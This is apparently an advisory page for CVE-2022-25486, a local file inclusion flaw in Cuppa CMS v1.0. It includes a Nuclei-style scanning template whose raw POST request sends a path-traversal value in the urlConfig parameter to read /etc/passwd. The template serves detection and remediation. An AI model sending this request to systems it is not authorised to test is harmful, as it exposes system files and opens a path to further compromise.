CVE-2022-25486: Cuppa CMS v1.0 - Local File Inclusion

2025-08-01 Cuppa CMS v1.0 PoC Public

Description

CuppaCMS v1.0 was discovered to contain a local file inclusion via the url parameter in /alerts/alertConfigField.php.

PoC

id: CVE-2022-25486

info:
  name: Cuppa CMS v1.0 - Local File Inclusion
  author: theamanrawat
  severity: high
  description: |
    CuppaCMS v1.0 was discovered to contain a local file inclusion via the url parameter in /alerts/alertConfigField.php.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access, sensitive information disclosure, and potential remote code execution.
  remediation: |
    Upgrade to the latest version of Cuppa CMS or apply the provided patch to fix the LFI vulnerability.
  reference:
    - https://github.com/CuppaCMS/CuppaCMS
    - https://nvd.nist.gov/vuln/detail/CVE-2022-25486
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
    cvss-score: 7.8
    cve-id: CVE-2022-25486
    cwe-id: CWE-829
    epss-score: 0.09966
    epss-percentile: 0.9535
    cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: cuppacms
    product: cuppacms
  tags: cve,cve2022,lfi,cuppa,cuppacms,vkev,vuln

http:
  - raw:
      - |
        POST /alerts/alertConfigField.php  HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        urlConfig=../../../../../../../../../etc/passwd

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200
# digest: 490a00463044022076cff46dc646bde13c54009349aa0100c3ff0c7c7bc4408475b3bb7d1067923402202ca91b5b3e2278adeb40f17831b7ef272233eb57cf61139c5058962212f54d61:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities